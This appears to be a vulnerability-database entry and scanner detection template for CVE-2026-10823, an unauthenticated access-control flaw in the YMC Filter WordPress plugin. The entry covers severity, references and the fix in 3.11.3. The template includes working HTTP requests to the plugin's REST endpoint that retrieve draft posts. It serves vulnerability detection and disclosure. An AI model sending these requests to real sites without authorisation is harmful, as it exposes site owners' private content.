/Vulnerability Library

YMC Filter WordPress - Unauthenticated Post Disclosure

CVE-2026-10823
Early Release

Description

YMC Filter WordPress plugin < 3.11.3 contains a broken access control vulnerability caused by improper authorization and lack of validation in a REST API endpoint, letting unauthenticated attackers retrieve private and non-public post content, exploit requires no authentication.

Severity

High

CVSS Score

7.5

Exploit Probability

0%

Affected Product

ymc-filter

Published Date

June 28, 2026

Template Author

hardik-369

CVE-2026-10823.yaml
id: CVE-2026-10823

info:
  name: YMC Filter WordPress - Unauthenticated Post Disclosure
  author: Hardik-369
  severity: high
  description: |
    YMC Filter WordPress plugin < 3.11.3 contains a broken access control vulnerability caused by improper authorization and lack of validation in a REST API endpoint, letting unauthenticated attackers retrieve private and non-public post content, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can access private, draft, and non-public post content, leading to sensitive information disclosure.
  remediation: |
    Update to version 3.11.3 or later.
  reference:
    - https://wpscan.com/vulnerability/b55ebf9e-a05d-4ae4-b653-da7db63e76d2/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-10823
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-10823
    epss-score: 0.00256
    epss-percentile: 0.16856
    cwe-id: CWE-200
  metadata:
    max-request: 2
    verified: true
    vendor: ymc
    product: ymc-filter
    publicwww-query: "/plugins/ymc-smart-filter/"
  tags: cve,cve2026,wordpress,wp-plugin,ymc-filter,disclosure,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-json/ymc/v1/posts/filter HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"params":{"filter_id":1,"post_status":"publish"}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "\"success\":true")'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-json/ymc/v1/posts/filter HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"params":{"filter_id":1,"post_status":"draft"}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "\"success\":true", "post-card")'
        condition: and
# digest: 4a0a00473045022100e0362550597e0ed1d87dd6f539d6984d1280ed6344ddb9f99a965b4f2a67e3f0022027a714009aa9d9e807eebe31b0a743972824c190649bc578f053897fa3037a1c:922c64590222798bb761d5b6d8e72950
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-10823
CWE ID:
cwe-200

References

https://wpscan.com/vulnerability/b55ebf9e-a05d-4ae4-b653-da7db63e76d2/https://nvd.nist.gov/vuln/detail/CVE-2026-10823

Remediation Steps

Update to version 3.11.3 or later.